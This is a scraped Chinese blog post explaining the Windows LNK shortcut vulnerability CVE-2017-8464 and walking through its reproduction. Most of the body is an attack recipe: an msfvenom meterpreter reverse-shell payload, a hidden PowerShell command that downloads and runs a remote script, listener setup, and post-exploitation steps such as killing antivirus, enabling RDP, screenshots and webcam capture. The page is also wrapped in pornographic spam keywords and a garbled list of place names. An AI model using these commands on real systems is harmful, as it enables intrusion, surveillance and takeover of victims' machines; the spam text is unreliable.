五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

什么是 CVE-2017-8464 怎么復現(xiàn)

2022-02-15 16:58 作者:天涯客追隨  | 我要投稿

說明:

2017年6月13日,微軟官方發(fā)布編號為CVE-2017-8464的漏洞公告,官方介紹Windows系統(tǒng)在解析快捷方式時存在遠程執(zhí)行任意代碼的高危漏洞,黑客可以通過U盤、網(wǎng)絡共享等途徑觸發(fā)漏洞,完全控制用戶系統(tǒng),安全風險高危

傳播的載體一般是LNK ,LNK是windows系統(tǒng)內(nèi)應用程序快捷方式文件的文件類型后綴名。

危害:

被攻擊機插入存在攻擊lnk的U盤后會反彈shell,哪怕是被隔離的內(nèi)網(wǎng),也可以在不上網(wǎng)的情況下被攻擊。

二、環(huán)境準備:

1 可復現(xiàn)的操作系統(tǒng)版本:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems

  • Microsoft Windows 10 Version 1607 for x64-based Systems

  • Microsoft Windows 10 for 32-bit Systems

  • Microsoft Windows 10 for x64-based Systems

  • Microsoft Windows 10 version 1511 for 32-bit Systems

  • Microsoft Windows 10 version 1511 for x64-based Systems

  • Microsoft Windows 10 version 1703 for 32-bit Systems

  • Microsoft Windows 10 version 1703 for x64-based Systems

  • Microsoft Windows 7 for 32-bit Systems SP1

  • Microsoft Windows 7 for x64-based Systems SP1

  • Microsoft Windows 8.1 for 32-bit Systems

  • Microsoft Windows 8.1 for x64-based Systems

  • Microsoft Windows RT 8.1

2 可復現(xiàn)的服務器系統(tǒng)版本:

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1

  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1

  • Microsoft Windows Server 2008 for 32-bit Systems SP2

  • Microsoft Windows Server 2008 for Itanium-based Systems SP2

  • Microsoft Windows Server 2008 for x64-based Systems SP2

  • Microsoft Windows Server 2012

  • Microsoft Windows Server 2012 R2

  • Microsoft Windows Server 2016

3 kali操作系統(tǒng)

三、利用原理

創(chuàng)建惡意快捷方式,包含惡意執(zhí)行腳本,點擊惡意快捷方式,導致本機中病毒,并且被遠控。

四、實戰(zhàn)利用

啟動MSF

終端內(nèi)輸入:msfconsole

開始利用:

1、使用MSF創(chuàng)建一個后門

msf內(nèi)輸入:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.23 lport=4456 -f psh-reflection>/var/www/html/link.ps1

2、在kali下開啟apache2

終端內(nèi)輸入:service apache2 start

3、通過社會學進行快捷方式傳播

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.204.135/link.ps1');test.ps1"


4 回到MSF終端配置監(jiān)聽

msf內(nèi)輸入: ?use exploit/multi/handler

5 配置payload

set payload windows/x64/meterpreter/reverse_tcp


msf中輸入 : show options ? 配置payload


設置 LHOST ?和 ?LPORT

maf中輸入:

5.1 ?set lhost <當前機器ip> 設置 LHOST

5.2 ?set lport ?<未被占用的端口> ?設置 LPORT


5.3 ?最后在 輸入 show options 查看配置是否生效


6、執(zhí)行監(jiān)聽

msf中輸入 : run 或者 ?exploit


進入靶機執(zhí)行我們在靶機上創(chuàng)建的快捷方式


稍等片刻獲取到meterpreter


五、后滲透

1、通過快捷方式執(zhí)行程序

meterpreter中輸入 ?shell


發(fā)現(xiàn)shell顯示有亂碼

shell內(nèi)輸入 ?chcp 65001


然后進入desktop目錄(這個是win的桌面)

根據(jù)實際情況拼路徑

shell 里輸入:cd users/mb/desktop


2 更多操作

查看進程:ps查看當前進程號:getpid查看系統(tǒng)信息:sysinfo查看目標機是否為虛擬機:run post/windows/gather/checkvm查看完整網(wǎng)絡設置:route查看當前權限:getuid自動提權:getsystem關閉殺毒軟件:run post/windows/manage/killav啟動遠程桌面協(xié)議:run post/windows/manage/enable_rdp列舉當前登錄的用戶:run post/windows/gather/enum_logged_on_users查看當前應用程序:run post/windows/gather/enum_applications抓取目標機的屏幕截圖:load espia ; screengrab抓取攝像頭的照片:webcam_snap查看當前處于目標機的那個目錄:pwd查看當前目錄:getlwd



注意所有操作均在實驗環(huán)境下進行,僅用于教學展示,請勿用于其他渠道 出現(xiàn)任何問題與本up無關!

什么是 CVE-2017-8464 怎么復現(xiàn)的評論 (共 條)

分享到微博請遵守國家法律
鸡西市| 万全县| 科技| 山丹县| 莫力| 甘德县| 普洱| 商洛市| 承德县| 开江县| 重庆市| 桂平市| 饶平县| 团风县| 株洲县| 民权县| 苍山县| 嘉荫县| 宁晋县| 华阴市| 怀化市| 睢宁县| 莫力| 赣州市| 馆陶县| 尼玛县| 龙游县| 财经| 南川市| 莱西市| 马公市| 兴山县| 微博| 班戈县| 子洲县| 文成县| 祥云县| 右玉县| 沁阳市| 华亭县| 霍林郭勒市|